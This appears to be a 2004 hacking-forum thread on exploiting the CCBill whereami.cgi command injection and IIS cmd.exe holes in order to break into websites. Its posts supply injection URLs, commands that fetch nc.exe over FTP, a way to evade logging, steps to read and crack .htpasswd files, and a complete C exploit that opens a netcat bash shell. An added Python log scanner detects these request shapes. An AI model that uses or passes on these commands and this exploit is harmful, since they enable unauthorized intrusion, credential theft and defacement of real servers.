Forums: /cgi-bin/whereami.cgi?g=ls - Help With This - Forums


/cgi-bin/whereami.cgi?g=ls - Help With This What can I do

#1 rUn-gUn

  • Private
  • Group: Members
  • Posts: 8
  • Joined: 11-August 03

Posted 18 May 2004 - 03:37 PM

Hey guys, I'm fairly new to exploiting and such. What can I do when I get access to this page

/cgi-bin/whereami.cgi?g=ls

on a website.... It says like DUMP OF Environment Variables and shows all this info about the site/server.

I heard you can execute shell commands somehow. Anyone know about this?

#2 Guest_atomix_*

  • Group: Guests

Posted 18 May 2004 - 04:15 PM

vuln is old as shit... I'm sure you can do it like this:

cgi-bin/whereami.cgi?g=|ls|

or
cgi-bin/whereami.cgi?g=|`ls`|

#3 rUn-gUn

  • Private
  • Group: Members
  • Posts: 8
  • Joined: 11-August 03

Posted 18 May 2004 - 04:18 PM

Yeah, but what does it do?

#4 Guest_rapt0r_*

  • Group: Guests

Posted 18 May 2004 - 05:58 PM

I believe this is used to run commands sort of like SQL Injection techniques. Is that what you are trying to do?

#5 rUn-gUn

  • Private
  • Group: Members
  • Posts: 8
  • Joined: 11-August 03

Posted 18 May 2004 - 06:15 PM

Well, I'm just trying to gain access to the site through this exploit... but I'm not sure how I run commands with it, and which commands to run..

#6 Blackknight

  • Private First Class
  • Group: Members
  • Posts: 129
  • Joined: 22-September 03

Posted 18 May 2004 - 07:24 PM

You're trying to hack the page.. yay for you

But for learning purposes, the whole point is to get past the filters and execute a command, the command most likely being a unix command. ls is like dir for windows, etc.
From there you can send a reverse shell to your box and try a local root attempt.
But if you just want to deface the site.. then you can do that with the reverse shell..
I won't go into details; you can do some research :blink:

#7 setthesun

  • Master Sergeant
  • Group: Specialist
  • Posts: 574
  • Joined: 13-February 04

Posted 18 May 2004 - 09:21 PM

Put a pipe and execute commands in bash. Of course you have to know unix.

setthesun me = new setthesun();

#8 fizzik

  • Private
  • Group: Members
  • Posts: 10
  • Joined: 13-March 04

Posted 18 May 2004 - 11:35 PM

atomix is right, the exploit is old as shit. Having said that, you will VERY occasionally find them. whereami.cgi?g=commands. It is a ccbill script, by the way.

#9 EXPLOiTED

  • Sergeant
  • Group: Members
  • Posts: 236
  • Joined: 23-October 03

Posted 19 May 2004 - 08:28 PM

Well... You don't necessarily need to know UNiX... I'm not talking about this specific question of /cgi-bin/whereami.cgi?g=ls. I found a hole in another site, where I need to gain shell back to fix something... and I scanned... found "CGi holes"... such as:

/scripts/cmd.exe?/c+dir%20c:\

Now when I exec that, I see the dir of C:\... But I can't seem to do anything else (ie FTP, mkdir, net start) and I was wondering if there were any possible way to gain a shell from this... Any insights?

#10 brainbuster

  • Private First Class
  • Group: Members
  • Posts: 119
  • Joined: 20-February 04

Posted 20 May 2004 - 12:54 AM

You could do..

/scripts/cmd.exe?/c+echo open 123.123.123.123>ftp.bat

/scripts/cmd.exe?/c+echo username >ftp.bat

/scripts/cmd.exe?/c+echo password>ftp.bat

/scripts/cmd.exe?/c+echo get nc.exe>ftp.bat

then you run :

/scripts/cmd.exe?/c+ftp -s:ftp.bat

and voila nc.exe is downloaded :-)

#11 EXPLOiTED

  • Sergeant
  • Group: Members
  • Posts: 236
  • Joined: 23-October 03

Posted 20 May 2004 - 07:26 AM

It seems as though I can only use "DiR"... I will search around and find a text that I can possibly open, maybe get a login / pw for telnet, and fix my problem :\. Thanks for the help

EXPLOiTED

#12 DJVandal

  • Private First Class
  • Group: Members
  • Posts: 81
  • Joined: 23-September 03

Posted 04 June 2004 - 02:38 AM

rUn-gUn, on May 19 2004, 02:15 AM, said:

Well, I'm just trying to gain access to the site through this exploit... but I'm not sure how I run commands with it, and which commands to run..

ok so I am assuming this is a porn site :) my specialty

This script is old but has been renamed a lot of times, also to glocation.cgi and a couple of other names. Anyhow, you want access to the site, right? So you need a password.

try g=locate */.htpasswd
g=locate *.passwd

and such. Also try replacing locate with find.

Once you have found the htpasswd file, use
g=cat /usr/www/pornosite.com/cgi-bin/.htpasswd

of course using the real path to the passfile instead. You will now most likely have a list of usernames and DES encrypted passwords. There are many programs out there to decrypt DES and it is not a hard encryption to crack.

#13 lee

  • Private
  • Group: Members
  • Posts: 12
  • Joined: 21-December 03

Posted 04 June 2004 - 04:24 AM

If you can only DIR, but not exec, try to copy the cmd.exe to another one and use this one... by the way, all your activity with cmd.exe will be logged...

/scripts/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+low.exe
/scripts/low.exe?/c+........................

the commands you run with low.exe are not logged... and should have exec access...

#14 Guest_saendler_*

  • Group: Guests

Posted 04 June 2004 - 04:28 AM

It is an old sploit, but test it....

/*
* =====================================
* CCBILL CGI Remote Exploit for /ccbill/whereami.cgi
* By: Knight420
* 7/07/03
*
* spawns a shell with netcat and attempts to connect
* into the server on port 6666 to gain access of the
* webserver uid
*
* © COPYRIGHT Blue Ballz , 2003
* all rights reserved
* =====================================
*
*/

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>


unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);

unsigned char ccbill[] =
"GET /ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
"GET /cgi-bin/ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
"GET /cgi-bin/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a";

int
main (int argc, char **argv)
{
int socket;
char *TARGET = "TARGET";
char *server;
unsigned short int port;
struct sockaddr_in sa;

if (argc != 3) {
system("clear");
printf ("[CCBILL CGI Remote Exploit By:Knight420]\n"
"usage: %s <host> <port>\n");
exit (EXIT_FAILURE);
}
setenv (TARGET, argv[1], 1);
server = argv[1];
port = atoi (argv[2]);

socket = net_connect (&sa, server, port, 35);
if (socket <= 0) {
perror ("net_connect");
exit (EXIT_FAILURE);
}

write (socket, ccbill, strlen (ccbill));
sleep (1);
close (socket);

printf ("[CCBILL CGI Remote Exploit By:Knight420]\n");
printf ("[1] evil data sent.\n", server);
printf ("[2] connecting to shell.\n", server);
system("nc ${TARGET} 6666 || echo '[-]Exploit failed!'");
exit (EXIT_SUCCESS);
}

unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;

i = inet_addr (host);
if (i == -1) {
he = gethostbyname (host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}

return (i);
}


int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;

/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);

cs->sin_addr.s_addr = net_resolve (server);
if (cs->sin_addr.s_addr == 0) {
close (fd);
return (-1);
}

flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}

error = 0;

n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;

FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;

n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);

if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);

return (fd);
}
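Added example, not code from the thread or from CCBill: a Python scan over constructed access-log lines that flags the request shapes this thread describes (the whereami.cgi/glocation.cgi `g` parameter carrying pipes or command names, and requests that name cmd.exe under /scripts), which is the detection side of what the posts above exploit. Script names, rule labels and the sample log are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache-style access-log lines (not from the thread) in the request
# shapes discussed above: the CCBill CGI 'g' parameter and IIS /scripts/cmd.exe.
SAMPLE_LOG = """\
203.0.113.7 - - [18/May/2004:15:37:02 +0000] "GET /cgi-bin/whereami.cgi?g=ls HTTP/1.0" 200 2111
203.0.113.7 - - [18/May/2004:16:15:40 +0000] "GET /cgi-bin/whereami.cgi?g=|ls| HTTP/1.0" 200 845
203.0.113.7 - - [04/Jun/2004:02:38:11 +0000] "GET /cgi-bin/glocation.cgi?g=locate%20*/.htpasswd HTTP/1.0" 200 312
198.51.100.9 - - [04/Jun/2004:04:28:55 +0000] "GET /cgi-bin/ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0" 200 0
198.51.100.9 - - [20/May/2004:00:54:03 +0000] "GET /scripts/cmd.exe?/c+dir%20c:\\ HTTP/1.0" 200 1650
192.0.2.44 - - [18/May/2004:09:00:00 +0000] "GET /cgi-bin/whereami.cgi?g= HTTP/1.0" 200 2100
"""

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')
CCBILL_SCRIPTS = {"whereami.cgi", "glocation.cgi"}   # names given in the thread
SHELL_META = re.compile(r"[|;&`$<>\n]")              # characters the shell interprets
SHELL_CMDS = re.compile(r"^(ls|cat|locate|find|nc|sh|bash|wget|curl|id|uname)\b")

def classify(target):
    """Return (rule, decoded_parameter) for a suspicious request target, else None."""
    parts = urlsplit(target)
    name = parts.path.rsplit("/", 1)[-1].lower()
    if name in CCBILL_SCRIPTS:
        g = parse_qs(parts.query, keep_blank_values=True).get("g")
        if g is None:
            return None
        value = g[0].strip()
        # The CGI hands 'g' to a shell, so a bare command name is as bad as a pipe.
        if SHELL_META.search(value) or SHELL_CMDS.match(value):
            return ("cgi-command-injection", value)
        return ("ccbill-cgi-probe", value)       # script reached, no command seen yet
    if name == "cmd.exe":
        # Any request that names cmd.exe through the web server is hostile.
        return ("iis-cmd-exe", unquote_plus(parts.query))
    return None

def scan_log(text):
    """Return (line_no, client_ip, rule, decoded_value) for each flagged line."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        hit = classify(m.group("target"))
        if hit:
            findings.append((line_no, line.split(" ", 1)[0], hit[0], hit[1]))
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags the first four lines as command injection, the fifth as a cmd.exe request, and the blank `g=` line as a probe of the script.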

#15 D3ADLiN3

  • Private First Class
  • Group: Members
  • Posts: 111
  • Joined: 13-December 03

Posted 04 June 2004 - 06:15 AM

That exploit ain't a lot of good if the server hasn't got netcat on it :P

Also I doubt you can deface the website, since the webscript would be under the apache user and would have jack all rights.